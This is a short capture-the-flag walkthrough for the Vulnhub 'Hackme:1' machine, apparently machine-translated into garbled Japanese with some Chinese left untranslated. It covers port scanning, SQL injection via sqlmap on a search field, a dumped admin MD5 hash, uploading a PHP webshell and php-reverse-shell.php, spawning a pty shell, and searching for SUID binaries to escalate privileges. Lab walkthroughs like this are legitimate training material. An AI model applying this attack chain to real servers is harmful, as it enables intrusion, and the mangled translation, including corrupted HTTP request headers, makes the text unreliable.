Hackme:1:Vulnhubチュートリアル

 

ダウンロードリンク:

https://www.vulnhub.com/entry/hackme-1,330/

 

ネットワーク走査プローブ:

╰─nmapの-p1-65535 -sV N 10.10.202.131

22 / tcpのオープンSSH

80 / tcpのオープンHTTPのApache HTTPD 2.4.34((Ubuntuの))

 

SSHブラストは、試すのに十分で、見つかった可能性があり、その制約の数

 

ウェブ開始:

右のソース・レジスタ・インタフェースを探します

登録:管理者#と、正常ログイン

 

 

箱注射を検索してみてください:

POST /welcome.php HTTP / 1.1
ホスト:10.10.202.131
のUser-Agent:Mozillaの/ 5.0(X11; Linuxのx86_64で、RV:52.0)のGecko / 20100101 Firefoxの/ 52.0
受け入れ:text / htmlで、アプリケーション/ XHTML + xmlの、アプリケーション/ XML; Q = 0.9、* / *; Q = 0.8
のAccept-言語:EN-USを、EN; Q = 0.5
のAccept-エンコード:gzipで、収縮させる
リファラーを:http://10.10.202.131/welcome.php
クッキー:PHPSESSID = 8270007cakt7suts49gpagv058
接続:クローズ
アップグレード-安全でない-要求:1
のContent-Type:アプリケーション/ x-www-form-urlencodedで
のContent-Length:8

検索= 1

手の検出:

 

 

 说明存在SQL注入漏洞,用sqlmap 跑一波

 

superadmin / 2386acb2cf356944177746fc92523983

https://hashkiller.co.uk/Cracker

2386acb2cf356944177746fc92523983 MD5 Uncrackable

okay  登录成功,看到了上传点:

 

 好像直接可以上传PHP文件,尝试浏览访问下

 

尝试访问不行,尝试c99.php OK

 

 

进行反弹shell

 cd /usr/share/webshells

╰─ cp php-reverse-shell.php /root

 

 上传访问php-reverse-shell.php反弹shell

$ python -c 'import pty; pty.spawn("/bin/bash")'

 

进行提权操作,具体可参考:https://www.cnblogs.com/hack404/p/10502187.html

$ find / -perm -u=s -type f 2>/dev/null

 

 

おすすめ

転載: www.cnblogs.com/hack404/p/11272181.html